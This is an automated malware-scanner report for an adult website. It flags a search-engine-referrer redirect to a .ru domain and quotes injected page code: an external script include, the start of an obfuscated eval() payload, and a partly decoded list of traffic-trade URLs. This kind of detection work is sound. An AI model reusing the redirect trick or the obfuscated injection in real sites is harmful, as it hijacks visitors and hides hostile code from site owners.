New scan:

Malware Scanner report for s3exy.com

Malicious/Suspicious/Total urls checked
1/9/15
10 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://ivsenaidu.ru/?q=www.s3exy.com
1098 websites infected.

The website "s3exy.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://www.s3exy.com/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: www.s3exy.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Sat, 27 Sep 2014 11:03:01 GMT
Location: http://ivsenaidu.ru/?q=www.s3exy.com
Server: Apache/2.2.22 (@RELEASE@)
Content-Length: 10
Content-Type: text/html
X-Powered-By: PHP/5.3.3
malicious

Scanned pages/files

RequestServer responseStatus
http://www.s3exy.com/
200 OK
Content-Length: 62031
Content-Type: text/html
suspicious
Page code contains blacklisted domain: s1.slimtrade.com

...[139 bytes skipped]...
ww.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="JavaScript" type="text/javascript">var VerifyCode = "330968974168380";</script>
<META content="text/html; charset=windows-1251" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.7600.16444">
<script type="text/javascript" src="http://s1.slimtrade.com/s6930.js"></script>
<style>
a.anc:link { font-family:Georgia, Times, serif;text-decoration: none; color:#330000;}
a.anc:visited { text-decoration: none; color:#660099}
a.anc:active { text-decoration: none; color:#FF6633}
a.anc:hover {text-decoration:underline; color:#FF0000;}
</style>
<style type="text/css">
<!--
.textborder {
border: 1px double #000000;
}
-->
</style>
...[3771 bytes skipped]...

http://s1.slimtrade.com/s6930.js
200 OK
Content-Length: 46141
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: salaespecial.com

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('e 1s=2l 4g("9z-9y.5k (37)","9x.5p (2)","9w.eu (2)","9A.H (2)","9B.4V (0)","9E.O (0)","9D.H (0)","9C-9v.O (0)","9u.H (0)","9n.O (0)","9m.O (0)","9l.O (0)","9k.9o.H (0)");e 1U=2l 4g("j://9p-9t.5k","j://9s.5p","j://9r.eu","j://4a.9q.H","j://4a
...[3549 bytes skipped]...

Decoded script:


var stTrName=new Array("xHamster-Porn.info (37)","NudeArtGirls.org (2)","PornFiles.eu (2)","salaespecial.com (2)","Latouffe.fr (0)","ThePornList.net (0)","SexCollegeTube.com (0)","Sex-Extreme.net (0)","SafeFreePornSites.com (0)","Querverweis.net (0)","PornoRoulette.net (0)","Porn4AllFreaks.net (0)","XXX.HDPornoSites.com (0)");var stTrUrl=new Array("http://xhamster-porn.info","http://nudeartgirls.org","http://pornfiles.eu","http://www.salaespecial.com","http://www.latouffe.fr","http://www.thepornlist.net","http://sexcollegetube.com","http://sex-
...[90460 bytes skipped]...

http://www.s3exy.com/engine/classes/js/jquery.js
200 OK
Content-Length: 91340
Content-Type: text/javascript
clean
http://www.s3exy.com/engine/classes/js/jqueryui.js
200 OK
Content-Length: 64578
Content-Type: text/javascript
clean
http://www.s3exy.com/engine/classes/js/dle_js.js
200 OK
Content-Length: 16095
Content-Type: text/javascript
clean
http://www.s3exy.com/engine/skins/default.js
200 OK
Content-Length: 8642
Content-Type: text/javascript
clean
http://www.s3exy.com/masturbation
200 OK
Content-Length: 63066
Content-Type: text/html
suspicious
Page code contains blacklisted domain: s1.slimtrade.com

...[139 bytes skipped]...
ww.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="JavaScript" type="text/javascript">var VerifyCode = "330968974168380";</script>
<META content="text/html; charset=windows-1251" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.7600.16444">
<script type="text/javascript" src="http://s1.slimtrade.com/s6930.js"></script>
<style>
a.anc:link { font-family:Georgia, Times, serif;text-decoration: none; color:#330000;}
a.anc:visited { text-decoration: none; color:#660099}
a.anc:active { text-decoration: none; color:#FF6633}
a.anc:hover {text-decoration:underline; color:#FF0000;}
</style>
<style type="text/css">
<!--
.textborder {
border: 1px double #000000;
}
-->
</style>
...[3801 bytes skipped]...

http://www.s3exy.com/full-movies
200 OK
Content-Length: 59556
Content-Type: text/html
suspicious
Page code contains blacklisted domain: s1.slimtrade.com

...[139 bytes skipped]...
ww.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="JavaScript" type="text/javascript">var VerifyCode = "330968974168380";</script>
<META content="text/html; charset=windows-1251" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.7600.16444">
<script type="text/javascript" src="http://s1.slimtrade.com/s6930.js"></script>
<style>
a.anc:link { font-family:Georgia, Times, serif;text-decoration: none; color:#330000;}
a.anc:visited { text-decoration: none; color:#660099}
a.anc:active { text-decoration: none; color:#FF6633}
a.anc:hover {text-decoration:underline; color:#FF0000;}
</style>
<style type="text/css">
<!--
.textborder {
border: 1px double #000000;
}
-->
</style>
...[3775 bytes skipped]...

http://www.s3exy.com/cum-shots
200 OK
Content-Length: 66414
Content-Type: text/html
suspicious
Suspicious code found

</span>

http://www.s3exy.com/engine/classes/highslide/highslide.js
200 OK
Content-Length: 32986
Content-Type: text/javascript
clean
http://www.s3exy.com/bisexual
200 OK
Content-Length: 60618
Content-Type: text/html
suspicious
Page code contains blacklisted domain: s1.slimtrade.com

...[139 bytes skipped]...
ww.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="JavaScript" type="text/javascript">var VerifyCode = "330968974168380";</script>
<META content="text/html; charset=windows-1251" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.7600.16444">
<script type="text/javascript" src="http://s1.slimtrade.com/s6930.js"></script>
<style>
a.anc:link { font-family:Georgia, Times, serif;text-decoration: none; color:#330000;}
a.anc:visited { text-decoration: none; color:#660099}
a.anc:active { text-decoration: none; color:#FF6633}
a.anc:hover {text-decoration:underline; color:#FF0000;}
</style>
<style type="text/css">
<!--
.textborder {
border: 1px double #000000;
}
-->
</style>
...[3801 bytes skipped]...

http://www.s3exy.com/hardcore
200 OK
Content-Length: 63025
Content-Type: text/html
suspicious
Page code contains blacklisted domain: s1.slimtrade.com

...[139 bytes skipped]...
ww.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="JavaScript" type="text/javascript">var VerifyCode = "330968974168380";</script>
<META content="text/html; charset=windows-1251" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.7600.16444">
<script type="text/javascript" src="http://s1.slimtrade.com/s6930.js"></script>
<style>
a.anc:link { font-family:Georgia, Times, serif;text-decoration: none; color:#330000;}
a.anc:visited { text-decoration: none; color:#660099}
a.anc:active { text-decoration: none; color:#FF6633}
a.anc:hover {text-decoration:underline; color:#FF0000;}
</style>
<style type="text/css">
<!--
.textborder {
border: 1px double #000000;
}
-->
</style>
...[3801 bytes skipped]...

http://www.s3exy.com/creampie
200 OK
Content-Length: 68131
Content-Type: text/html
suspicious
Suspicious code found

</span>

http://www.s3exy.com/lesbians
200 OK
Content-Length: 62695
Content-Type: text/html
suspicious
Page code contains blacklisted domain: s1.slimtrade.com

...[139 bytes skipped]...
ww.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="JavaScript" type="text/javascript">var VerifyCode = "330968974168380";</script>
<META content="text/html; charset=windows-1251" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.7600.16444">
<script type="text/javascript" src="http://s1.slimtrade.com/s6930.js"></script>
<style>
a.anc:link { font-family:Georgia, Times, serif;text-decoration: none; color:#330000;}
a.anc:visited { text-decoration: none; color:#660099}
a.anc:active { text-decoration: none; color:#FF6633}
a.anc:hover {text-decoration:underline; color:#FF0000;}
</style>
<style type="text/css">
<!--
.textborder {
border: 1px double #000000;
}
-->
</style>
...[3801 bytes skipped]...

http://www.s3exy.com/amateur
200 OK
Content-Length: 62907
Content-Type: text/html
suspicious
Page code contains blacklisted domain: s1.slimtrade.com

...[139 bytes skipped]...
ww.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="JavaScript" type="text/javascript">var VerifyCode = "330968974168380";</script>
<META content="text/html; charset=windows-1251" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.7600.16444">
<script type="text/javascript" src="http://s1.slimtrade.com/s6930.js"></script>
<style>
a.anc:link { font-family:Georgia, Times, serif;text-decoration: none; color:#330000;}
a.anc:visited { text-decoration: none; color:#660099}
a.anc:active { text-decoration: none; color:#FF6633}
a.anc:hover {text-decoration:underline; color:#FF0000;}
</style>
<style type="text/css">
<!--
.textborder {
border: 1px double #000000;
}
-->
</style>
...[3801 bytes skipped]...

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=s3exy.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://s3exy.com/

Result: s3exy.com is not infected or malware details are not published yet.